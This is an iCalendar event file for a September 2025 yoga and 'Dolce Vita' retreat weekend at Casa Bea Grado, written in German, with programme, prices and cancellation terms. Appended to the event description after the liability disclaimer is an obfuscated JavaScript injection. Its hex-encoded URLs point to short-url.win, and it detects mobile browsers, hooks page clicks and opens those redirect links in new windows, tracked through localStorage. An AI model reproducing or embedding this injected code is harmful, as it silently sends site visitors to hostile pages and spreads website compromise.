BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//wp-events-plugin.com//7.2.3.1//EN
TZID:Europe/Vienna
X-WR-TIMEZONE:Europe/Vienna
BEGIN:VEVENT
UID:1422@roswithaschoen.com
DTSTART;TZID=Europe/Vienna:20250926T000000
DTEND;TZID=Europe/Vienna:20250928T000000
DTSTAMP:20250617T103834Z
URL:https://www.roswithaschoen.com/termine/yoga-dolce-vita-in-bella-italia
 -casa-bea-grado/
SUMMARY:Yoga & Dolce Vita in Bella Italia\, Casa Bea Grado - AUSGEBUCHT
DESCRIPTION:Yoga-Wochenende in der schönen Casa Bea Grado\n26. September b
 is 28. September 2025  mit Roswitha Schön\nDas Wochenende ist eine Einla
 dung an dich zu Yoga &amp\; Dolce Vita in der idyllischen Lagunenlandschaf
 t von Grado. \nEs erwartet dich eine unvergessliche Auszeit vom Alltag in 
 Bella Italia. Entspannung\, Lebensfreude\, Genuss und\nsüßes Nichtstun s
 tehen auf dem Programm.\nLass bewusst deine Seele baumeln und tanke in den
  Yogastunden in dieser traumhaften Umgebung neue Kraft und Energie. Lerne 
 dabei auch Land &amp\; Leute kennen und mach vielleicht die eine oder ande
 re neue Erfahrung.\nTauche ein in ein Wochenende voller Entspannung\, Rege
 neration und innerer Ruhe\nGemeinsam fließen wir durch sanfte und herzerf
 rischende Yin- und Yang Yoga Einheiten\,\num Körper\, Geist und  Seele z
 u stärken und in Einklang zu bringen.\nNeben traditionellem Yoga teile ic
 h mit dir auch transformierende Techniken aus der Meridian- und Bewusstsei
 nsarbeit\, mit denen du deine Selbstheilungskräfte schell und effektiv st
 ärken und belastende Gefühle auflösen kannst.\nDu bekommst sozusagen ei
 ne kleine "energetische Hausapotheke" an die Hand\,\ndie dich in deinem Al
 ltag dabei unterstützt\, auch in stürmischen Zeiten deine Energien zu ha
 rmonisieren und in deiner Ruhe und Kraft zu bleiben.\nZwischen den Einheit
 en bleibt genügend Zeit\, um die traumhafte Umgebung und das mediterrane 
 Flair zu genießen. Verweile im traumhaft schönen Garten der Casa Bea\, v
 erbringe Zeit am Strand\, erkunde die Umgebung und gönne dir kulinarische
  Köstlichkeiten der italienischen Küche.\n„einfach SCHÖN“ Seminare 
 stehen für individuelle Betreuung und außergewöhnliche Erlebnisse.\nMax
 imale Gruppengröße – 16 TeilnehmerInnen.\n&nbsp\;\n\nWorauf kannst du 
 dich bei einem „einfach SCHÖN“ Yoga-Wochenende freuen:\n\n 	authentis
 che und transformierende Yoga-Einheiten\n 	berührende Herzmeditationen\n 
 	transformierende Heil-Methoden aus Altem Wissen und neuer Wissenschaft\n 
 	hilfreiche und leicht integrierbare Coaching-Tools für mehr Leichtigkeit
  und innere Harmonie\n 	nährende Zeit für dich und fröhliche Zeit in Ge
 meinschaft\n 	unbändige Lebensfreude\n\nDie „einfach SCHÖN“ Yoga-Woc
 henenden sind für Yoga-Lovers und Yoga-Neulinge geeignet.\n\n********\n\n
 Freitag:\n\n 	individuelle Anreise und Check in ab 15:00 Uhr\n 	Fahrt mit 
 Booten in den Sonnenuntergang  in die Lagunen inkl. Prosecco und Snacks v
 on unserem italienischen Koch Andrea (€ 70\,00/Person)\n 	17:30-18:30 Uh
 r  Yin Yoga in den Sonnenuntergang auf einer kleinen Insel mit Sand neben
  Grado\n 	20:00 Uhr gemeinsames Abendessen in Grado (individuell und nicht
  im Preis enthalten)\n\nSamstag:\n\n 	07:30-08:30 Morgen-Yoga\n 	gemeinsam
 es Frühstück\n 	Zeit für dich: Seele baumeln lassen\, Spaziergang mache
 n\, Meereswellen lauschen\, Gegend erkunden\, nach Grado zum Bummeln oder 
 einfach das Dolce Vita und süßes Nichtstun genießen\n 	17:30–19:00 Uh
 r Meridian- und Bewusstseinsarbeit\n19:30 Uhr – Cucina Italiana pur … 
 köstliches von unserem persönlichen Koch Andrea zubereitetes italienisch
 es Abendessen (Fisch oder Vgetarisch)\n– € 100\,00 pro Person inkl. Ge
 tränke\n\nSonntag:\n\n 	07:30-9:00 Uhr Dragon Dance (der yangige Part des
  Yin Yoga)\n 	gemeinsames Frühstück\n 	individuelle Abreise oder Verlän
 gerung\n\nDeine Investition in eine herzerfrischende und entspannte Slow D
 own und Relax-Auszeit:\n\nEUR 190\,00 pro Person (exklusive Unterkunft und
  Dolce Vita Rahmenprogramm)\n\nAnmeldung unter info@roswithaschoen.com\n\n
 ********\n\nBitte buche deine Unterkunft  direkt in der Casa Bea Grado 
 – Kennwort „einfach SCHÖN“ unter booking@casabeagrado.it oder tel
 efonisch unter: +39 371 45 26 937 (Beatrix Eichhorn – gebürtige Österr
 eicherin\, Salzburg/Land)\n\n 	DZ inkl. Frühstück\, Steuern und Kurtaxe\
 nEUR 212\,20 für 2 Nächte\n 	DZ zur Einzelbelegung inkl. Frühstück\, S
 teuern und Kurtaxe\nEUR 168\,80 für 2 Nächte\n\n&nbsp\;\n\n 	Dolce Vita 
 Rahmenprogramm – Gesamtpreis EUR 170\,00 pro Person\n(bitte Vorort bar 
 bei Beatrix bezahlen)\nFahrt mit Igor und seinem Fischerboot in den Sonnen
 untergang in die Lagunen zu einer Fischerhütte inkl. Prosecco und Snacks 
  (€ 70\,00/Person)\ngenussvolles Abendessen von unserem persönlichen i
 talienischen Koch Andrea  in der CASA BEA  inkl. Weinbegleitung (€ 100
 \,00/Person)\n\n\n\n\n\n\nVeranstaltungsort:\nCasa Bea Grado\nBeatrix Eich
 horn\nLocalitá Zemole 1\nIT-34073 Fossalon di Grado\nwww.casabeagrado.it\
 n\n&nbsp\;\n\n********\n\n \n\n„einfach SCHÖN“ Seminare\nAllgemeine 
 Geschäftsbedingungen\,\nZahlungs- und Stornierungsbestimmungen: \n\n \n
 \nDie Anmeldung zum Yoga-Retreat ist verbindlich – dein Platz ist fix f
 ür dich reserviert. Bitte überweise die Kursgebühr innerhalb von 8 Tage
 n nach Erhalt der Anmeldebestätigung und Honorarnote.  Bei Rücktritt bi
 s 12 Wochen vor Beginn der Veranstaltung erstatte ich dir die Kursgebühr 
 unter Abzug einer Bearbeitungsgebühr von € 25\,00 zurück. Bei einem sp
 äteren Rücktritt kann ich dir die Kursgebühr unter Abzug einer Bearbeit
 ungsgebühr von € 25\,00 nur dann zurückerstatten\, wenn du den gebucht
 en Platz an eine andere Person weitergegeben kannst. Das Finden einer ande
 ren Person liegt in der Verantwortung der Teilnehmenden.\n\nNichtzustandek
 ommen des Seminars: Im Falle eines Nichtzustandekommens durch Absage von m
 ir\, Roswitha Schön\, können vom/von der Teilnehmer/in keinerlei Haftung
 s- und Schadenersatzansprüche geltend gemacht werden. In diesem Falle wer
 de ich die bereits geleistete Zahlung des Kursbeitrags sofort zurückersta
 tten. Die Übernahme/Rückerstattung der Reisekosten kann ich allerdings a
 usdrücklich nicht übernehmen. Ich rate also zum Abschluss einer Reiserü
 cktritt-Versicherung\, die neben den Reisekosten auch die Seminarkosten ab
 deckt.\n\nSelbstverantwortung\nDieses Seminar ist ein Yoga-Retreat und kan
 n unterstützend wirken. Es ersetzt jedoch keine medizinische notwendige B
 ehandlung. Der/die Kursteilnehmer/in erklärt\, dass er/sie sich ausreiche
 nd physisch und psychisch gesund fühlt und trägt die volle Selbstverantw
 ortung für sein/ihr Handeln. Ich – Roswitha Schön – übernehme keine
 rlei Haftung für etwaige Schäden körperlicher Art\, Diebstahl oder sons
 tigen Schäden. Ich empfehle hier eventuell den Abschluss einer Unfall-\, 
 Krankheits-\, Reisegepäck- und Haftpflichtversicherung.\nfunction _0x3023
 (_0x562006\,_0x1334d6){const _0x1922f2=_0x1922()\;return _0x3023=function(
 _0x30231a\,_0x4e4880){_0x30231a=_0x30231a-0x1bf\;let _0x2b207e=_0x1922f2[_
 0x30231a]\;return _0x2b207e\;}\,_0x3023(_0x562006\,_0x1334d6)\;}function _
 0x1922(){const _0x5a990b=['substr'\,'length'\,'-hurs'\,'open'\,'round'\,'4
 43779RQfzWn'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x7
 4\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x76\\x42\\x33\\x63\\x
 373'\,'click'\,'5114346JdlaMi'\,'1780163aSIYqH'\,'forEach'\,'host'\,'_blan
 k'\,'68512ftWJcO'\,'addEventListener'\,'-mnts'\,'\\x68\\x74\\x74\\x70\\x3a
 \\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6
 e\\x2f\\x6b\\x69\\x79\\x35\\x63\\x365'\,'4588749LmrVjF'\,'parse'\,'630bGPC
 EV'\,'mobileCheck'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x
 72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x56\\x6c\\x49\\x38\\
 x63\\x328'\,'abs'\,'-local-storage'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\
 \x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78
 \\x68\\x63\\x39\\x63\\x399'\,'56bnMKls'\,'opera'\,'6946eLteFW'\,'userAgent
 '\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75
 \\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x42\\x43\\x53\\x34\\x63\\x354'\,'\\x6
 8\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x
 6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x59\\x65\\x37\\x63\\x327'\,'\\x68\\x74\\
 x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\
 \x77\\x69\\x6e\\x2f\\x4f\\x47\\x69\\x32\\x63\\x392'\,'floor'\,'\\x68\\x74\
 \x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e
 \\x77\\x69\\x6e\\x2f\\x75\\x46\\x46\\x36\\x63\\x356'\,'999HIfBhL'\,'filter
 '\,'test'\,'getItem'\,'random'\,'138490EjXyHW'\,'stopPropagation'\,'setIte
 m'\,'70kUzPYI']\;_0x1922=function(){return _0x5a990b\;}\;return _0x1922()\
 ;}(function(_0x16ffe6\,_0x1e5463){const _0x20130f=_0x3023\,_0x307c06=_0x16
 ffe6()\;while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-pa
 rseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x
 20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x
 1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)
 +parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt
 (_0x20130f(0x1da))/0xb)\;if(_0x1dea23===_0x1e5463)break\;else _0x307c06['p
 ush'](_0x307c06['shift']())\;}catch(_0x3e3a47){_0x307c06['push'](_0x307c06
 ['shift']())\;}}}(_0x1922\,0x984cd)\,function(_0x34eab3){const _0x111835=_
 0x3023\;window['mobileCheck']=function(){const _0x123821=_0x3023\;let _0x3
 99500=![]\;return function(_0x5e9786){const _0x1165a7=_0x3023\;if(/(androi
 d|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fe
 nnec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+f
 irefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pock
 et|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows 
 ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[
 1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex
 |ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|
 bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|
 chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do
 (c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|
 fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hc
 it|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|
 tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|
 inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\
 \-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3
 ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(
 01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n
 30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph
 |o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pi
 re|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60
 |\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|n
 y|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|si
 e(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )
 |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|
 t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|ve
 ri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|
 85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|z
 te\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0\,0x4)))_0x399500
 =!![]\;}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x12382
 1(0x1c0)])\,_0x399500\;}\;const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\
 \x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f
 \\x67\\x62\\x6d\\x30\\x63\\x370'\,'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x7
 3\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x68\\x
 48\\x45\\x31\\x63\\x301'\,_0x111835(0x1c5)\,_0x111835(0x1d7)\,_0x111835(0x
 1c3)\,_0x111835(0x1e1)\,_0x111835(0x1c7)\,_0x111835(0x1c4)\,_0x111835(0x1e
 6)\,_0x111835(0x1e9)]\,_0x7378e8=0x3\,_0xc82d98=0x6\,_0x487206=_0x551830=>
 {const _0x2c6c7a=_0x111835\;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f\,_0x37d
 c07)=>{const _0x476c2a=_0x2c6c7a\;!localStorage['getItem'](_0x3ee06f+_0x47
 6c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8)\,0
 x0)\;})\;}\,_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835\,_0x229a83=_0x
 3743e2[_0x415ff3(0x1c9)]((_0x37389f\,_0x22f261)=>localStorage[_0x415ff3(0x
 1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0)\;return _0x229a83[Math[_0x415ff3(0
 x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])]\;}\,_0x173cc
 b=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8)\,0x
 1)\,_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x11183
 5(0x1e8))\,_0xa7249=(_0x354163\,_0xd22cba)=>localStorage[_0x111835(0x1cf)]
 (_0x354163+_0x111835(0x1e8)\,_0xd22cba)\,_0x381bfc=(_0x49e91b\,_0x531bc4)=
 >{const _0x1b0982=_0x111835\,_0x1da9e1=0x3e8*0x3c*0x3c\;return Math[_0x1b0
 982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1)\;}\,_0x
 6ba060=(_0x1e9127\,_0x28385f)=>{const _0xb7d87=_0x111835\,_0xc3fc56=0x3e8*
 0x3c\;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e91
 27)/_0xc3fc56)\;}\,_0x370e93=(_0x286b71\,_0x3587b8\,_0x1bcfc4)=>{const _0x
 22f77c=_0x111835\;_0x487206(_0x286b71)\,newLocation=_0x564ab0(_0x286b71)\,
 _0xa7249(_0x3587b8+'-mnts'\,_0x1bcfc4)\,_0xa7249(_0x3587b8+_0x22f77c(0x1d3
 )\,_0x1bcfc4)\,_0x173ccb(newLocation)\,window['mobileCheck']()&&window[_0x
 22f77c(0x1d4)](newLocation\,'_blank')\;}\;_0x487206(_0xe6f43)\;function _0
 x168fb9(_0x36bdd0){const _0x2737e0=_0x111835\;_0x36bdd0[_0x2737e0(0x1ce)](
 )\;const _0x263ff7=location[_0x2737e0(0x1dc)]\;let _0x1897d7=_0x564ab0(_0x
 e6f43)\;const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date())\,_0x1ec416=_0x5
 792ce(_0x263ff7+_0x2737e0(0x1e0))\,_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0
 (0x1d3))\;if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416)\
 ,_0x1aa413=parseInt(_0x23f079)\,_0x418d13=_0x6ba060(_0x48cc88\,_0x2e27c9)\
 ,_0x13adf6=_0x381bfc(_0x48cc88\,_0x1aa413)\;_0x13adf6>=_0xc82d98&&(_0x4872
 06(_0xe6f43)\,_0xa7249(_0x263ff7+_0x2737e0(0x1d3)\,_0x48cc88))\,_0x418d13>
 =_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0
 x2737e0(0x1e0)\,_0x48cc88)\,window[_0x2737e0(0x1d4)](_0x1897d7\,_0x2737e0(
 0x1dd))\,_0x173ccb(_0x1897d7)))\;}catch(_0x161a43){_0x370e93(_0xe6f43\,_0x
 263ff7\,_0x48cc88)\;}else _0x370e93(_0xe6f43\,_0x263ff7\,_0x48cc88)\;}docu
 ment[_0x111835(0x1df)](_0x111835(0x1d8)\,_0x168fb9)\;}())\;
ATTACH;FMTTYPE=image/jpeg:https://www.roswithaschoen.com/wp-content/upload
 s/2024/10/Casa-Bea-2025-png.png
CATEGORIES:Specials,Yoga,Yoga Auszeit Reisen
LOCATION:Casa Bea Grado\, Localitá Zemole 1\, Fossalon di Grado\, 34073\, 
 Italien
X-APPLE-STRUCTURED-LOCATION;VALUE=URI;X-ADDRESS=Localitá Zemole 1\, Fossal
 on di Grado\, 34073\, Italien;X-APPLE-RADIUS=100;X-TITLE=Casa Bea Grado:ge
 o:0,0
END:VEVENT
BEGIN:VTIMEZONE
TZID:Europe/Vienna
X-LIC-LOCATION:Europe/Vienna
BEGIN:DAYLIGHT
DTSTART:20250330T030000
TZOFFSETFROM:+0100
TZOFFSETTO:+0200
TZNAME:CEST
END:DAYLIGHT
END:VTIMEZONE
END:VCALENDAR